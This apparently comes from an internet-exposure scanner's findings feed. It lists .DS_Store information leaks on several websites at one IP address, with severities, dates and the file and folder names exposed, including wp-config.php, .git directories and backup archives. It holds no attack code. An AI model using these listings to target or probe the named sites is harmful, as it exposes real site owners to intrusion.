Fingerprint: 5f32cf5d6962f09c668fcbec668fcbec9fac0e6672cfcb39a5c2afdd8a3c8cc6Found 17 files trough .DS_Store spidering: /.idea /.idea/_notes /.idea/scopes /.metadata /_notes /cgi-bin /wp-admin /wp-admin/css /wp-admin/images /wp-admin/includes /wp-admin/js /wp-admin/maint /wp-admin/network /wp-admin/user /wp-content /wp-includes /wp-snapshots
Found on 2024-09-10 23:43 -
Severity: medium
Fingerprint: 5f32cf5d6962f09c7d264b917d264b9160849753017c087673603fa87cbe0457Found 52 files trough .DS_Store spidering: /.idea /.idea/_notes /.idea/scopes /.metadata /_notes /cgi-bin /wp-admin /wp-admin/css /wp-admin/images /wp-admin/includes /wp-admin/js /wp-admin/maint /wp-admin/network /wp-admin/user /wp-content /wp-content/plugins /wp-content/plugins/advanced-custom-fields /wp-content/plugins/custom-post-type-ui /wp-content/plugins/duplicator /wp-content/plugins/site-is-offline-plugin /wp-content/plugins/ultimate-maintenance-mode /wp-content/themes /wp-content/themes/cfd /wp-content/themes/cfd/_notes /wp-content/themes/cfd/assets /wp-content/themes/cfd/assets/css /wp-content/themes/cfd/assets/fonts /wp-content/themes/cfd/assets/img /wp-content/themes/cfd/assets/js /wp-content/themes/cfd/assets/less /wp-content/themes/cfd/assets/vendor /wp-content/themes/cfd/lang /wp-content/themes/cfd/lib /wp-content/themes/cfd/templates /wp-content/themes/twentyfifteen /wp-content/upgrade /wp-content/uploads /wp-content/uploads/2014 /wp-content/uploads/2014/10 /wp-content/uploads/2015 /wp-includes /wp-includes/certificates /wp-includes/css /wp-includes/fonts /wp-includes/ID3 /wp-includes/images /wp-includes/js /wp-includes/pomo /wp-includes/SimplePie /wp-includes/Text /wp-includes/theme-compat /wp-snapshots
Found on 2024-09-08 05:28 -
Severity: low
Fingerprint: 5f32cf5d6962f09cab28146bab28146b0b68ebdd68da4928bc84bb7202e1ad59Found 21 files trough .DS_Store spidering: /.idea /.idea/_notes /.idea/scopes /.metadata /_notes /cgi-bin /wp-admin /wp-admin/css /wp-admin/images /wp-admin/includes /wp-admin/js /wp-admin/maint /wp-admin/network /wp-admin/user /wp-content /wp-content/plugins /wp-content/themes /wp-content/upgrade /wp-content/uploads /wp-includes /wp-snapshots
Found on 2024-09-01 01:54 -
Severity: low
Fingerprint: 5f32cf5d6962f09c31c2f0b631c2f0b60d4a9648ccc0591bcf51b8df2dde76fdFound 28 files trough .DS_Store spidering: /.idea /.idea/_notes /.idea/scopes /.metadata /_notes /cgi-bin /wp-admin /wp-admin/css /wp-admin/images /wp-admin/includes /wp-admin/js /wp-admin/maint /wp-admin/network /wp-admin/user /wp-content /wp-content/plugins /wp-content/plugins/advanced-custom-fields /wp-content/plugins/custom-post-type-ui /wp-content/plugins/duplicator /wp-content/plugins/site-is-offline-plugin /wp-content/plugins/ultimate-maintenance-mode /wp-content/themes /wp-content/themes/cfd /wp-content/themes/twentyfifteen /wp-content/upgrade /wp-content/uploads /wp-includes /wp-snapshots
Found on 2024-08-30 03:20 -
Severity: medium
Fingerprint: 5f32cf5d6962f09c2acf29aa2acf29aa2be5c6ac9bbf5177d3bcbc9ba083170cFound 33 files trough .DS_Store spidering: /.idea /.idea/_notes /.idea/scopes /.metadata /_notes /cgi-bin /wp-admin /wp-admin/css /wp-admin/images /wp-admin/includes /wp-admin/js /wp-admin/maint /wp-admin/network /wp-admin/user /wp-content /wp-content/plugins /wp-content/plugins/advanced-custom-fields /wp-content/plugins/custom-post-type-ui /wp-content/plugins/duplicator /wp-content/plugins/site-is-offline-plugin /wp-content/plugins/ultimate-maintenance-mode /wp-content/themes /wp-content/themes/cfd /wp-content/themes/cfd/_notes /wp-content/themes/cfd/assets /wp-content/themes/cfd/lang /wp-content/themes/cfd/lib /wp-content/themes/cfd/templates /wp-content/themes/twentyfifteen /wp-content/upgrade /wp-content/uploads /wp-includes /wp-snapshots
Found on 2024-05-29 20:33 -
Severity: low
Fingerprint: 5f32cf5d6962f09c8329733f8329733f267656412fc17a2402c7a0ee4f232867Found 10 files trough .DS_Store spidering: /.idea /.idea/_notes /.idea/scopes /.metadata /_notes /cgi-bin /wp-admin /wp-content /wp-includes /wp-snapshots
Found on 2022-09-03 17:48
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-20 18:35
Last seen 2024-09-16 15:33
Open for 696 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c3c1fc5e93c1fc5e9466051ac734856ccb5d31acf1720259eFound 5 files trough .DS_Store spidering: /asset /css /fonts /images /js
Found on 2024-09-16 15:33
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-20 18:35
Last seen 2024-09-16 15:07
Open for 696 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c3c1fc5e93c1fc5e9466051ac734856ccb5d31acf1720259eFound 5 files trough .DS_Store spidering: /asset /css /fonts /images /js
Found on 2024-09-16 15:07
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: www.grace.austynandbrian.com
Port: 443
URL: https://www.grace.austynandbrian.comFirst seen 2022-09-23 17:37
Last seen 2024-09-16 15:02
Open for 723 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-09-16 15:02
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-21 18:03
Last seen 2024-09-16 13:51
Open for 695 days-
Severity: medium
Fingerprint: 5f32cf5d6962f09c70ba7b5770ba7b579a2bc1b00143b801d239c02f7e971367Found 54 files trough .DS_Store spidering: /_notes /images /images/company_images /images/images /index.html /Sunny Corn Temp /Sunny Corn Temp/images /sunny_corn /Wood_furniture_restoration_&_refurbishing /Wood_furniture_restoration_&_refurbishing/AC_RunActiveContent.js /Wood_furniture_restoration_&_refurbishing/Back-ground-Din-Home.gif /Wood_furniture_restoration_&_refurbishing/Buy_Coffee_Table.html /Wood_furniture_restoration_&_refurbishing/Choice-of-stains.gif /Wood_furniture_restoration_&_refurbishing/DIN-Home-Web-Hosting-Limited-Time-Offer.gif /Wood_furniture_restoration_&_refurbishing/DIN-HOME_Coffee_Table_Images.html /Wood_furniture_restoration_&_refurbishing/DIN.docx /Wood_furniture_restoration_&_refurbishing/dinhome ecotable picture 0.jpg /Wood_furniture_restoration_&_refurbishing/dinhome ecotable picture 01.jpg /Wood_furniture_restoration_&_refurbishing/dinhome ecotable picture 1.jpg /Wood_furniture_restoration_&_refurbishing/DINHOME-Logo.jpg /Wood_furniture_restoration_&_refurbishing/dinhome.jpg /Wood_furniture_restoration_&_refurbishing/ECO Bench Ottoman 2.4 /Wood_furniture_restoration_&_refurbishing/ECO Coffee Table 1.9 /Wood_furniture_restoration_&_refurbishing/ECO Coffee Table 2.4 /Wood_furniture_restoration_&_refurbishing/ECO Coffee Table Images.swf /Wood_furniture_restoration_&_refurbishing/Eco Friendly Table.jpg /Wood_furniture_restoration_&_refurbishing/ECO-Bench-Ottoman-2.4-image.gif /Wood_furniture_restoration_&_refurbishing/ECO-Bench-Ottoman-2.4.gif /Wood_furniture_restoration_&_refurbishing/Eco-Coffee-Table--Birch-Finish.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-1.9.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-1.9image.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-2.1.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-2.1image.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-2.4-image.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-2.4.gif /Wood_furniture_restoration_&_refurbishing/favicon.ico /Wood_furniture_restoration_&_refurbishing/index.css /Wood_furniture_restoration_&_refurbishing/index.html /Wood_furniture_restoration_&_refurbishing/Natural-Finish.gif /Wood_furniture_restoration_&_refurbishing/Natural_ECO_Coffee_Table.html /Wood_furniture_restoration_&_refurbishing/Pricing /Wood_furniture_restoration_&_refurbishing/Produits_Maison_DIN_Home_Products_Contact.html /Wood_furniture_restoration_&_refurbishing/Register and Start Selling /Wood_furniture_restoration_&_refurbishing/Scripts /Wood_furniture_restoration_&_refurbishing/sitemap.xml /Wood_furniture_restoration_&_refurbishing/SpryAssets /Wood_furniture_restoration_&_refurbishing/Stain_Color_for_Eco_Coffee_Table.html /Wood_furniture_restoration_&_refurbishing/Stained Finishing.psd /Wood_furniture_restoration_&_refurbishing/Stained-Finishing.gif /Wood_furniture_restoration_&_refurbishing/Stained_&_Varnished_Coffee Table.html /Wood_furniture_restoration_&_refurbishing/Tables Home Products and web hosting.jpg /Wood_furniture_restoration_&_refurbishing/Varnished-Birch-Coffee-Table-For-Protection.gif /Wood_furniture_restoration_&_refurbishing/Varnished-For-Protection.gif /Wood_furniture_restoration_&_refurbishing/Varnished_ECO_Coffee_Table.html
Found on 2024-09-16 13:51 -
Severity: medium
Fingerprint: 5f32cf5d6962f09cecc85b04ecc85b04e86d46ed2be25d86f5667ee88f3bbac5Found 53 files trough .DS_Store spidering: /_notes /images /images/company_images /images/images /index.html /Sunny Corn /Sunny Corn/images /Wood_furniture_restoration_&_refurbishing /Wood_furniture_restoration_&_refurbishing/AC_RunActiveContent.js /Wood_furniture_restoration_&_refurbishing/Back-ground-Din-Home.gif /Wood_furniture_restoration_&_refurbishing/Buy_Coffee_Table.html /Wood_furniture_restoration_&_refurbishing/Choice-of-stains.gif /Wood_furniture_restoration_&_refurbishing/DIN-Home-Web-Hosting-Limited-Time-Offer.gif /Wood_furniture_restoration_&_refurbishing/DIN-HOME_Coffee_Table_Images.html /Wood_furniture_restoration_&_refurbishing/DIN.docx /Wood_furniture_restoration_&_refurbishing/dinhome ecotable picture 0.jpg /Wood_furniture_restoration_&_refurbishing/dinhome ecotable picture 01.jpg /Wood_furniture_restoration_&_refurbishing/dinhome ecotable picture 1.jpg /Wood_furniture_restoration_&_refurbishing/DINHOME-Logo.jpg /Wood_furniture_restoration_&_refurbishing/dinhome.jpg /Wood_furniture_restoration_&_refurbishing/ECO Bench Ottoman 2.4 /Wood_furniture_restoration_&_refurbishing/ECO Coffee Table 1.9 /Wood_furniture_restoration_&_refurbishing/ECO Coffee Table 2.4 /Wood_furniture_restoration_&_refurbishing/ECO Coffee Table Images.swf /Wood_furniture_restoration_&_refurbishing/Eco Friendly Table.jpg /Wood_furniture_restoration_&_refurbishing/ECO-Bench-Ottoman-2.4-image.gif /Wood_furniture_restoration_&_refurbishing/ECO-Bench-Ottoman-2.4.gif /Wood_furniture_restoration_&_refurbishing/Eco-Coffee-Table--Birch-Finish.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-1.9.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-1.9image.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-2.1.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-2.1image.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-2.4-image.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-2.4.gif /Wood_furniture_restoration_&_refurbishing/favicon.ico /Wood_furniture_restoration_&_refurbishing/index.css /Wood_furniture_restoration_&_refurbishing/index.html /Wood_furniture_restoration_&_refurbishing/Natural-Finish.gif /Wood_furniture_restoration_&_refurbishing/Natural_ECO_Coffee_Table.html /Wood_furniture_restoration_&_refurbishing/Pricing /Wood_furniture_restoration_&_refurbishing/Produits_Maison_DIN_Home_Products_Contact.html /Wood_furniture_restoration_&_refurbishing/Register and Start Selling /Wood_furniture_restoration_&_refurbishing/Scripts /Wood_furniture_restoration_&_refurbishing/sitemap.xml /Wood_furniture_restoration_&_refurbishing/SpryAssets /Wood_furniture_restoration_&_refurbishing/Stain_Color_for_Eco_Coffee_Table.html /Wood_furniture_restoration_&_refurbishing/Stained Finishing.psd /Wood_furniture_restoration_&_refurbishing/Stained-Finishing.gif /Wood_furniture_restoration_&_refurbishing/Stained_&_Varnished_Coffee Table.html /Wood_furniture_restoration_&_refurbishing/Tables Home Products and web hosting.jpg /Wood_furniture_restoration_&_refurbishing/Varnished-Birch-Coffee-Table-For-Protection.gif /Wood_furniture_restoration_&_refurbishing/Varnished-For-Protection.gif /Wood_furniture_restoration_&_refurbishing/Varnished_ECO_Coffee_Table.html
Found on 2023-05-03 18:08 -
Severity: low
Fingerprint: 5f32cf5d6962f09c1a5d9b0f1a5d9b0f661bc6c861963df20051ecb80051ecb8Found 3 files trough .DS_Store spidering: /images /images/company_images /index.html
Found on 2022-10-21 18:03
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-20 18:34
Last seen 2024-09-16 13:45
Open for 696 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-09-16 13:45
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-12-18 18:41
Last seen 2024-09-16 13:33
Open for 637 days-
Severity: medium
Fingerprint: 5f32cf5d6962f09cd4047824d40478241b871cc2a40ce067d868b186c56b30b4Found 35 files trough .DS_Store spidering: /.DS_Store /.git /.gitignore /.htaccess /authorize.php /CHANGELOG.txt /COPYRIGHT.txt /cron.php /includes /index.php /INSTALL.mysql.txt /INSTALL.pgsql.txt /install.php /INSTALL.sqlite.txt /INSTALL.txt /LICENSE.txt /MAINTAINERS.txt /misc /modules /profiles /README.txt /robots.txt /scripts /sites /sites/all /sites/all/libraries /sites/all/libraries/less.php /sites/default /sites/example.sites.php /sites/README.txt /themes /update.php /UPGRADE.txt /web.config /xmlrpc.php
Found on 2024-09-16 13:33 -
Severity: low
Fingerprint: 5f32cf5d6962f09cf35cbfb3f35cbfb391cb3501500dced2dac33721c3fa9fc9Found 29 files trough .DS_Store spidering: /.DS_Store /.git /.gitignore /.htaccess /authorize.php /CHANGELOG.txt /COPYRIGHT.txt /cron.php /includes /index.php /INSTALL.mysql.txt /INSTALL.pgsql.txt /install.php /INSTALL.sqlite.txt /INSTALL.txt /LICENSE.txt /MAINTAINERS.txt /misc /modules /profiles /README.txt /robots.txt /scripts /sites /themes /update.php /UPGRADE.txt /web.config /xmlrpc.php
Found on 2024-09-05 00:37 -
Severity: medium
Fingerprint: 5f32cf5d6962f09ca629b8b1a629b8b143a27af3538b923450299d7b7927ec8aFound 34 files trough .DS_Store spidering: /.DS_Store /.git /.gitignore /.htaccess /authorize.php /CHANGELOG.txt /COPYRIGHT.txt /cron.php /includes /index.php /INSTALL.mysql.txt /INSTALL.pgsql.txt /install.php /INSTALL.sqlite.txt /INSTALL.txt /LICENSE.txt /MAINTAINERS.txt /misc /modules /profiles /README.txt /robots.txt /scripts /sites /sites/all /sites/all/libraries /sites/default /sites/example.sites.php /sites/README.txt /themes /update.php /UPGRADE.txt /web.config /xmlrpc.php
Found on 2024-07-10 07:14 -
Severity: medium
Fingerprint: 5f32cf5d6962f09c2acf29aa2acf29aabe06c3b48ae79529658ffac091255406Found 33 files trough .DS_Store spidering: /.DS_Store /.git /.gitignore /.htaccess /authorize.php /CHANGELOG.txt /COPYRIGHT.txt /cron.php /includes /index.php /INSTALL.mysql.txt /INSTALL.pgsql.txt /install.php /INSTALL.sqlite.txt /INSTALL.txt /LICENSE.txt /MAINTAINERS.txt /misc /modules /profiles /README.txt /robots.txt /scripts /sites /sites/all /sites/default /sites/example.sites.php /sites/README.txt /themes /update.php /UPGRADE.txt /web.config /xmlrpc.php
Found on 2024-04-28 23:23
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2024-08-17 21:55
Last seen 2024-09-16 13:29
Open for 29 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c7cf176427cf17642b4ffba1cabd14320abd14320abd14320Found 2 files trough .DS_Store spidering: /wp-content /wp-includes
Found on 2024-09-16 13:29
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-12-31 18:54
Last seen 2024-09-16 13:21
Open for 624 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c2eda814e2eda814efa4e382f4ba6ab874f3a0e468067f85fFound 6 files trough .DS_Store spidering: /_notes /Din-Home_marketing_consultants /Din-Home_marketing_consultants/Photoshop /Din-Home_marketing_consultants/SpryAssets /images /SpryAssets
Found on 2024-09-16 13:21
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-20 18:31
Last seen 2024-09-16 13:03
Open for 696 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c4239b3d84239b3d83fa5bcae254fbb4f2bc97ef927c132d4Found 8 files trough .DS_Store spidering: /javascript /site.psd /site_index.jpg /site_projectlist.jpg /site_selectedproject.jpg /site_work.jpg /siteimages /type
Found on 2024-09-16 13:03
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: www.lumbralmexico.monasteriourbano.com
Port: 443
URL: https://www.lumbralmexico.monasteriourbano.comFirst seen 2022-10-20 18:34
Last seen 2024-09-16 12:51
Open for 696 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-09-16 12:51
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2023-05-23 18:19
Last seen 2024-09-16 12:51
Open for 481 days-
Severity: high
Fingerprint: 5f32cf5d6962f09c7c3d3e457c3d3e458d83a3f48a8cfb7b13aedafabce51a8aFound 30 files trough .DS_Store spidering: /2013 backup /2013 backup/wordpress-seo-local /2013 backup/wordpress-seo-local 2 /2013 backup/wordpress-seo-local-1.3.0.3.zip /2013 backup/wp-admin /2013 backup/wp-admin.zip /2014 web stuff /404.html /_notes /CE /CE/_notes /CE/CE Course Application Ethics.pdf /codecanyon-7254656-smart-forms /contact.php /css /css/color /css/lib /css/style.css /fonts /handouts /handouts/AfterTheStormFront.pdf /images /index-background-slider.html /index-content-slider.html /index-multi-slider.html /index.html /js /Laura /version-alternative.html /version-personal.html
Found on 2024-09-16 12:51 -
Severity: high
Fingerprint: 5f32cf5d6962f09c87f05b7087f05b70aab6dca98b3988026e7b62c711051917Found 26 files trough .DS_Store spidering: /2013 backup /2013 backup/wordpress-seo-local /2013 backup/wordpress-seo-local 2 /2013 backup/wordpress-seo-local-1.3.0.3.zip /2013 backup/wp-admin /2013 backup/wp-admin.zip /2014 web stuff /404.html /_notes /CE /CE/_notes /CE/CE Course Application Ethics.pdf /codecanyon-7254656-smart-forms /contact.php /css /fonts /handouts /images /index-background-slider.html /index-content-slider.html /index-multi-slider.html /index.html /js /Laura /version-alternative.html /version-personal.html
Found on 2024-09-10 23:29 -
Severity: high
Fingerprint: 5f32cf5d6962f09cf35cbfb3f35cbfb30059779a6c140e652b13f48c0be8852fFound 29 files trough .DS_Store spidering: /2013 backup /2013 backup/wordpress-seo-local /2013 backup/wordpress-seo-local 2 /2013 backup/wordpress-seo-local-1.3.0.3.zip /2013 backup/wp-admin /2013 backup/wp-admin.zip /2014 web stuff /404.html /_notes /CE /CE/_notes /CE/CE Course Application Ethics.pdf /codecanyon-7254656-smart-forms /contact.php /css /css/color /css/lib /css/style.css /fonts /handouts /images /index-background-slider.html /index-content-slider.html /index-multi-slider.html /index.html /js /Laura /version-alternative.html /version-personal.html
Found on 2024-09-02 18:42 -
Severity: high
Fingerprint: 5f32cf5d6962f09cb1c4b1dfb1c4b1df6d5e0c16f8e804616ad31eb847c538b8Found 61 files trough .DS_Store spidering: /2013 backup /2013 backup/wordpress-seo-local /2013 backup/wordpress-seo-local 2 /2013 backup/wordpress-seo-local-1.3.0.3.zip /2013 backup/wp-admin /2013 backup/wp-admin.zip /2014 web stuff /404.html /_notes /CE /CE/_notes /CE/CE Course Application Ethics.pdf /codecanyon-7254656-smart-forms /contact.php /css /css/color /css/lib /css/style.css /fonts /handouts /handouts/AfterTheStormFront.pdf /images /images/_notes /images/air-movers.jpg /images/big-logo.jpg /images/favicon.ico /images/fire-damage.png /images/grabbing.png /images/icon_FB.png /images/icon_GOOGLE.png /images/icon_MAMMOTH.png /images/icon_WEB.png /images/loader.gif /images/loader@2x.gif /images/logo.png /images/logo@2x.png /images/Mammoth-about.png /images/mammoth-palm-beach.jpg /images/mold.png /images/placeholder-1160x480.png /images/placeholder-1160x480@2x.png /images/placeholder-1800x1200.png /images/placeholder-1800x1200@2x.png /images/placeholder-380x253.png /images/placeholder-380x253@2x.png /images/placeholder-380x468.png /images/placeholder-380x468@2x.png /images/placeholder-800x533.png /images/placeholder-800x533@2x.png /images/sample-typography.png /images/sample-typography@2x.png /images/water-damage.jpg /images/water.png /index-background-slider.html /index-content-slider.html /index-multi-slider.html /index.html /js /Laura /version-alternative.html /version-personal.html
Found on 2024-09-01 22:40 -
Severity: high
Fingerprint: 5f32cf5d6962f09c0f8dcf020f8dcf028ef1d2d371196d0054cb0cfd64cd2b62Found 24 files trough .DS_Store spidering: /2013 backup /2013 backup/wordpress-seo-local /2013 backup/wordpress-seo-local 2 /2013 backup/wordpress-seo-local-1.3.0.3.zip /2013 backup/wp-admin /2013 backup/wp-admin.zip /2014 web stuff /404.html /_notes /CE /codecanyon-7254656-smart-forms /contact.php /css /fonts /handouts /images /index-background-slider.html /index-content-slider.html /index-multi-slider.html /index.html /js /Laura /version-alternative.html /version-personal.html
Found on 2024-06-18 16:59
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-21 18:03
Last seen 2024-09-16 12:44
Open for 695 days-
Severity: medium
Fingerprint: 5f32cf5d6962f09c70ba7b5770ba7b579a2bc1b00143b801d239c02f7e971367Found 54 files trough .DS_Store spidering: /_notes /images /images/company_images /images/images /index.html /Sunny Corn Temp /Sunny Corn Temp/images /sunny_corn /Wood_furniture_restoration_&_refurbishing /Wood_furniture_restoration_&_refurbishing/AC_RunActiveContent.js /Wood_furniture_restoration_&_refurbishing/Back-ground-Din-Home.gif /Wood_furniture_restoration_&_refurbishing/Buy_Coffee_Table.html /Wood_furniture_restoration_&_refurbishing/Choice-of-stains.gif /Wood_furniture_restoration_&_refurbishing/DIN-Home-Web-Hosting-Limited-Time-Offer.gif /Wood_furniture_restoration_&_refurbishing/DIN-HOME_Coffee_Table_Images.html /Wood_furniture_restoration_&_refurbishing/DIN.docx /Wood_furniture_restoration_&_refurbishing/dinhome ecotable picture 0.jpg /Wood_furniture_restoration_&_refurbishing/dinhome ecotable picture 01.jpg /Wood_furniture_restoration_&_refurbishing/dinhome ecotable picture 1.jpg /Wood_furniture_restoration_&_refurbishing/DINHOME-Logo.jpg /Wood_furniture_restoration_&_refurbishing/dinhome.jpg /Wood_furniture_restoration_&_refurbishing/ECO Bench Ottoman 2.4 /Wood_furniture_restoration_&_refurbishing/ECO Coffee Table 1.9 /Wood_furniture_restoration_&_refurbishing/ECO Coffee Table 2.4 /Wood_furniture_restoration_&_refurbishing/ECO Coffee Table Images.swf /Wood_furniture_restoration_&_refurbishing/Eco Friendly Table.jpg /Wood_furniture_restoration_&_refurbishing/ECO-Bench-Ottoman-2.4-image.gif /Wood_furniture_restoration_&_refurbishing/ECO-Bench-Ottoman-2.4.gif /Wood_furniture_restoration_&_refurbishing/Eco-Coffee-Table--Birch-Finish.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-1.9.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-1.9image.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-2.1.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-2.1image.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-2.4-image.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-2.4.gif /Wood_furniture_restoration_&_refurbishing/favicon.ico /Wood_furniture_restoration_&_refurbishing/index.css /Wood_furniture_restoration_&_refurbishing/index.html /Wood_furniture_restoration_&_refurbishing/Natural-Finish.gif /Wood_furniture_restoration_&_refurbishing/Natural_ECO_Coffee_Table.html /Wood_furniture_restoration_&_refurbishing/Pricing /Wood_furniture_restoration_&_refurbishing/Produits_Maison_DIN_Home_Products_Contact.html /Wood_furniture_restoration_&_refurbishing/Register and Start Selling /Wood_furniture_restoration_&_refurbishing/Scripts /Wood_furniture_restoration_&_refurbishing/sitemap.xml /Wood_furniture_restoration_&_refurbishing/SpryAssets /Wood_furniture_restoration_&_refurbishing/Stain_Color_for_Eco_Coffee_Table.html /Wood_furniture_restoration_&_refurbishing/Stained Finishing.psd /Wood_furniture_restoration_&_refurbishing/Stained-Finishing.gif /Wood_furniture_restoration_&_refurbishing/Stained_&_Varnished_Coffee Table.html /Wood_furniture_restoration_&_refurbishing/Tables Home Products and web hosting.jpg /Wood_furniture_restoration_&_refurbishing/Varnished-Birch-Coffee-Table-For-Protection.gif /Wood_furniture_restoration_&_refurbishing/Varnished-For-Protection.gif /Wood_furniture_restoration_&_refurbishing/Varnished_ECO_Coffee_Table.html
Found on 2024-09-16 12:44 -
Severity: low
Fingerprint: 5f32cf5d6962f09c3af247253af2472530e9b486533a568f95496cfded50324dFound 9 files trough .DS_Store spidering: /_notes /images /images/company_images /images/images /index.html /Sunny Corn Temp /Sunny Corn Temp/images /sunny_corn /Wood_furniture_restoration_&_refurbishing
Found on 2024-06-18 11:08 -
Severity: medium
